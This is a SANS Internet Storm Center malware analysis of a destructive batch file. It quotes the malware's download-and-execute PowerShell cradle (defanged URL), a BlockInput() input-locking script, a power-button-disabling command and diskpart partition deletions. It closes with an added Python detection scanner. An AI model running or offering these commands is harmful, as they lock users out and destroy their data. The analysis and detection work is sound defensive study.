[SANS ISC] A Simple Batch File That Blocks People, (Tue, Jan 4th)

I found another script that performs malicious actions. It's a simple batch file (.bat) that is not obfuscated, but it has a very low VT score (1/53). The file hash is cc8ae359b629bc40ec6151ddffae21ec8cbfbcf7ca7bda9b3d9687ca05b1d584. The file is detected by only one antivirus, which triggered on the "shutdown.exe" located at the end of the script! Why does this script annoy people? Because it uses the BlockInput() API call through a PowerShell one-liner:

powershell -exec bypass -w h -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('hxxps://phoenixthrush[.]com/payloads/scripts/disabling_user_input/disable_user_input.ps1')|iex"

iwr is the built-in alias for the PowerShell cmdlet Invoke-WebRequest (just as iex is the alias for Invoke-Expression), so the one-liner downloads the script and immediately executes it in memory.

Here is the PowerShell code downloaded and executed:

# requires Administrator
$code = @'
[DllImport("user32.dll")]
public static extern bool BlockInput(bool fBlockIt);
'@

# compile the P/Invoke declaration for user32!BlockInput into a .NET type
$userInput = Add-Type -MemberDefinition $code -Name Blocker -Namespace UserInput -PassThru

# block user input
$null = $userInput::BlockInput($true)

If you don't know the purpose of the BlockInput() API call[1]: the function expects one parameter, TRUE or FALSE. When TRUE is passed, it blocks keyboard and mouse input events from reaching applications. From the user's point of view, it means that no interaction with the computer is possible until the API is called a second time with FALSE. This API is provided by Microsoft to prevent the user from performing actions while the computer executes sensitive operations.

Tip: most people don't know it, but there is a way to "unlock" the computer: just press Ctrl-Alt-Delete, then select "Cancel".

The next one-liner used reconfigures the way the power button works:

powershell -exec bypass -w h -c "powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0"

powercfg.exe is a standard tool provided by Microsoft[2] that allows interaction with power schemes.

Then, the script drops two scripts on the target:

set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:\Windows\Temp\x.bat"" ", 0, true

The file x.bat is a long script that destroys the victim’s computer. Here are some pieces of code:

:: deleting some Windows partitions
echo Select Disk 0 >> y.txt
echo Select Partition 2 >> y.txt
echo Delete Partition Override >> y.txt
echo Select Partition 4 >> y.txt
echo Delete Partition Override >> y.txt
diskpart /s y.txt >nul

:: creating a message box
echo msgbox "stupid b*tch", 0, "get rekt, ur PC has been f*cked" >> y.vbs

That's the first time I have seen a call to BlockInput() in a batch file. This is a common anti-debugging technique implemented by malware to prevent the analyst from interacting with the debugger.
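As an added defensive example (not part of the diary), here is a small Python scanner that flags script files carrying the indicators seen in this chain: the hidden-window, execution-policy-bypass download cradle, the BlockInput() call, the power-button reconfiguration and the diskpart partition deletion. The sample scripts are constructed for the example and the URL is a placeholder.

```python
import re

# Indicator patterns distilled from the chain described above (constructed for
# this example; tune them before running against a real corpus).
INDICATORS = [
    ("hidden_bypass_download_cradle", re.compile(
        r"powershell[^\n]*-exec\s+bypass[^\n]*-w\s+h[^\n]*"
        r"\b(iwr|invoke-webrequest)\b[^\n]*\|\s*(iex|invoke-expression)\b", re.I)),
    ("blockinput_pinvoke", re.compile(r"\bBlockInput\s*\(", re.I)),
    ("power_button_disabled", re.compile(
        r"powercfg[^\n]*-setacvalueindex[^\n]*sub_buttons\s+pbuttonaction\s+0\b", re.I)),
    ("diskpart_delete_partition_override",
     re.compile(r"\bDelete\s+Partition\s+Override\b", re.I)),
    ("diskpart_script_run", re.compile(r"\bdiskpart(\.exe)?\s+/s\s+\S+", re.I)),
]


def scan_script(text):
    """Return the sorted names of all indicators that fire on one script body."""
    return sorted(name for name, rx in INDICATORS if rx.search(text))


def classify(text, threshold=2):
    """Flag a script when at least `threshold` independent indicators fire."""
    hits = scan_script(text)
    return {"hits": hits, "score": len(hits), "suspicious": len(hits) >= threshold}


# Constructed sample: a batch file mirroring the structure of the one analysed
# (placeholder URL, no real payload).
SAMPLE_BAT = r'''@echo off
powershell -exec bypass -w h -c "iwr('https://example.invalid/p.ps1')|iex"
powershell -exec bypass -w h -c "powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0"
echo Select Disk 0 >> y.txt
echo Delete Partition Override >> y.txt
diskpart /s y.txt >nul
'''

# Constructed sample: the downloaded PowerShell stage, reduced to its BlockInput call.
SAMPLE_PS1 = r'''$null = $userInput::BlockInput($true)'''

# Constructed sample: an ordinary admin script that should not be flagged.
SAMPLE_BENIGN = r'''@echo off
powershell -c "Get-ChildItem C:\Logs | Measure-Object"
powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 3
'''

if __name__ == "__main__":
    for label, body in (("x.bat", SAMPLE_BAT), ("stage.ps1", SAMPLE_PS1), ("benign.bat", SAMPLE_BENIGN)):
        print(label, classify(body))
```

The threshold requires two independent indicators before a file is flagged, so a lone powercfg call in a legitimate admin script does not trip it; the second-stage .ps1 is caught by the BlockInput indicator when scanned with a threshold of 1.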

[1] https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-blockinput
[2] https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
